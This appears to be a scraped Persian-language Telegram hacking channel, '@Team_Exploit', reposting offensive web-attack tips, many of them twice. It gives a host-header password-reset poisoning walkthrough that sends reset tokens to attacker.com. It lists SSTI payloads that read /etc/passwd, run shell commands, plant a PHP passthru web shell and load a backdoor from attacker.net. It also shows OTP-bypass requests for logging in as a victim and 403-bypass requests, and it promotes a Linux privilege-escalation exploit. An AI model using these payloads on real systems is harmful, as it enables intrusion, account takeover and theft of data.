نکات باگ بانتی !!!! Host Header Injection در https://example{.}com/Account/ForgotPassword
مراحل:
1. به قسمت لاگین اکانت بروید.
2. یک حساب آزمایشی ایجاد کنید.
3. به روی دکمه بازنشانی گذرواژه فراموش شده بزنید: https://examle{.}/Account/ForgotPassword
4. قبل از درج ایمیل
5. فاکسی پروکسی خود را روشن کنید.
6. برپ سوییت خود را باز کنید و به تب تاریخچه http بروید.
7. حالا ایمیل خود را وارد کنید. در تاریخچه http در burp
8. اکنون درخواست ارسال کنید و 200 پاسخ OK دریافت خواهید کرد.
9. به ایمیل/gmail خود بروید.
10. مقداری جادویی خواهید دید.
11. PoC آن پایین است. نکته! روی پیوند
بازنشانی رمز عبور من کلیک کنید:
attacker.com//█████/Account/ResetPassword?t=CfDJ8LnpFPwgh5FMpOb1F%2FCnxefoFCtP%2F0HrFpb7jdskSoUSujStlkgpGak5azwqOoBWm1DVWcQe3lrKczz%2B9tv568jSdFcc9DvArkFHWM1VKfWe37UhUKQrcpvvxAhtP73gcw%3D%3D
شما به دامنه مهاجم هدایت خواهید شد. اینگونه است که مهاجم پیوند بازنشانی رمز عبور قربانی را دریافت می کند تا بتواند حساب را تنها با میزبانی سرور خود انجام دهد و سایر اطلاعات حساس را دریافت کند.
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
مراحل:
1. به قسمت لاگین اکانت بروید.
2. یک حساب آزمایشی ایجاد کنید.
3. به روی دکمه بازنشانی گذرواژه فراموش شده بزنید: https://examle{.}/Account/ForgotPassword
4. قبل از درج ایمیل
5. فاکسی پروکسی خود را روشن کنید.
6. برپ سوییت خود را باز کنید و به تب تاریخچه http بروید.
7. حالا ایمیل خود را وارد کنید. در تاریخچه http در burp
8. اکنون درخواست ارسال کنید و 200 پاسخ OK دریافت خواهید کرد.
9. به ایمیل/gmail خود بروید.
10. مقداری جادویی خواهید دید.
11. PoC آن پایین است. نکته! روی پیوند
بازنشانی رمز عبور من کلیک کنید:
attacker.com//█████/Account/ResetPassword?t=CfDJ8LnpFPwgh5FMpOb1F%2FCnxefoFCtP%2F0HrFpb7jdskSoUSujStlkgpGak5azwqOoBWm1DVWcQe3lrKczz%2B9tv568jSdFcc9DvArkFHWM1VKfWe37UhUKQrcpvvxAhtP73gcw%3D%3D
شما به دامنه مهاجم هدایت خواهید شد. اینگونه است که مهاجم پیوند بازنشانی رمز عبور قربانی را دریافت می کند تا بتواند حساب را تنها با میزبانی سرور خود انجام دهد و سایر اطلاعات حساس را دریافت کند.
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
SSTI برخی پیلود های
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
Team Exploit
گروه هاکیری زارت شد که @mankihastme
شاید باور نکنید ولی این تو 20 دقیقه بن شد😂و اینکه اگه شما یه کانال بزنید و توش ویدیو پورن بزارید بعد ۲۴ بسته میشه!
نات کویین و کص کویین فلان کویین فقط یه بازیه که باهاش تعداد ادم های بیکار جهانو در بیارن
حالا هی با کله بکوب تو گوشیت!
حالا هی با کله بکوب تو گوشیت!
Hide-info.py
3.6 KB
یه تیکه کد برای اینکه بتونید اطلاعاتی که میخواید مخفی بمونه رو داخل عکس یا موزیک مخفی کنید! یکم قدیمیه و من اینو ۲ سال پیش نوشته بودم، گفتم بزارم شاید بدردتون بخوره
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
🔖تکنیک های بای پس OTP
1️⃣. دستکاری کد وضعیت اگر کد وضعیت 4xx باشد سعی کنید آن را به 200 OK تغییر دهید و ببینید آیا محدودیت ها را دور می زند
2️⃣. سعی کنید در قسمت OTP Empty OTP یا Set NULL ارسال کنید که otp=null برای دور زدن است
5️⃣. اگر درخواست در JSON است از آرایه پر از OTPهای تأیید ایمیل استفاده کنید تا از بین آنها فقط یک OTP معتبر باشد.
6️⃣. درخواست otp در هر دو دستگاه مهاجم و قربانی را به طور همزمان امتحان کنید، این می تواند توسط نفوذگر آروغ زدن انجام شود اگر OTP یکسان است، پس یک دور زدن otp آسان است.
7️⃣. بازسازی بی نهایت OTP اگر بتوانید یک OTP جدید را بی نهایت بار تولید کنید، OTP به اندازه کافی ساده است (4 عدد)، و می توانید تا 4 یا 5 توکن در هر OTP تولید شده را امتحان کنید، فقط می توانید هر بار همان 4 یا 5 توکن را امتحان کنید و OTP تولید کنید تا زمانی که با آنهایی که استفاده می کنید مطابقت دارد.
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
1️⃣. دستکاری کد وضعیت اگر کد وضعیت 4xx باشد سعی کنید آن را به 200 OK تغییر دهید و ببینید آیا محدودیت ها را دور می زند
2️⃣. سعی کنید در قسمت OTP Empty OTP یا Set NULL ارسال کنید که otp=null برای دور زدن است
POST /secondLogin HTTP/1.13️⃣. سعی کنید صفر را در پارامتر OTP که 000000 است وارد کنید تا OTP را دور بزنید.
Host: company.com
Content-Type: application/json
Content-Length: Number
{"email":"me","pass":"**","otp":""}
POST /secondLogin HTTP/1.14️⃣. اگر درخواست در JSON باشد درخواست OTP
Host: company.com
Origin: company.com
Content-Length: Number
{"email":"me","pass":"**","otp":"000000"}
{"phone_no":"victim_no"، "phone_no":"attacker_no"}مهاجم OTP-Login را با شماره مهاجم دریافت خواهد کرد
{"phone_no":"viktima_no", "phone_no":"attacker_no"،"otp":"1234"}و ما به عنوان VICTIM وارد سیستم می شویم
5️⃣. اگر درخواست در JSON است از آرایه پر از OTPهای تأیید ایمیل استفاده کنید تا از بین آنها فقط یک OTP معتبر باشد.
6️⃣. درخواست otp در هر دو دستگاه مهاجم و قربانی را به طور همزمان امتحان کنید، این می تواند توسط نفوذگر آروغ زدن انجام شود اگر OTP یکسان است، پس یک دور زدن otp آسان است.
7️⃣. بازسازی بی نهایت OTP اگر بتوانید یک OTP جدید را بی نهایت بار تولید کنید، OTP به اندازه کافی ساده است (4 عدد)، و می توانید تا 4 یا 5 توکن در هر OTP تولید شده را امتحان کنید، فقط می توانید هر بار همان 4 یا 5 توکن را امتحان کنید و OTP تولید کنید تا زمانی که با آنهایی که استفاده می کنید مطابقت دارد.
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
هشدار بهره برداری: CVE-2024-1086 (تشدید امتیاز محلی) 🚨
در میان هرج و مرج بکدور xz، این اکسپلویت مخفیانه ظاهر شد!
🔥 روی هسته های لینوکس 5.14 تا 6.6 کار می کند.
CVE: https://github.com/Notselwyn/CVE-2024-1086
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
در میان هرج و مرج بکدور xz، این اکسپلویت مخفیانه ظاهر شد!
🔥 روی هسته های لینوکس 5.14 تا 6.6 کار می کند.
CVE: https://github.com/Notselwyn/CVE-2024-1086
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
بای پس 403 (Forbidden)
1. با استفاده از هدر "X-Original-URL"
2. اضافه کردن %2e بعد از اولین اسلش
https://github.com/daffainfo/bypass-403
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
1. با استفاده از هدر "X-Original-URL"
GET /admin HTTP/1.1مثال
Host: target.com
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
2. اضافه کردن %2e بعد از اولین اسلش
target.com/admin => 403مثال
target.com/%2e/admin => 2003. نقطه (.) اسلش (/) و نقطه ویرگول (;) را در URL اضافه کنید
target.com/admin => 403مثال
target.com/secret/. => 200بعد از نام دایرکتوری "..;/" را اضافه کنید
target.com//secret// => 200
target.com/./secret/.. => 200
target.com/;/secret => 200
target.com/.;/secret => 200
target.com//;//secret => 200
target.com/adminمثال
target.com/admin..;/5. سعی کنید حروف الفبا را در آدرس اینترنتی بزرگ بنویسید
target.com/adminمثال
target.com/aDmIN6. از طریق Web Cache Poisoning
GET /anything HTTP/1.1ابزاری برای این کار ها:
Host: victim.com
X-Original-URL: /admin
https://github.com/daffainfo/bypass-403
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
آیا می دانید که اسلش های رو به جلو ("/") درون تگ های html به طور خودکار توسط مرورگرها به فاصله ("") تبدیل می شوند؟
به عنوان مثال:
<a/b='c'/d='e'/f='g'>X</a>به طور خودکار به تبدیل خواهد شد به:
<a b='c' d='e' f='g'>X</a>┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
موقع فاز کردن یه سایت وردپرسی "/_wpeprivate/config.json" را به لیست فازینگ خود اضافه کنید.
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit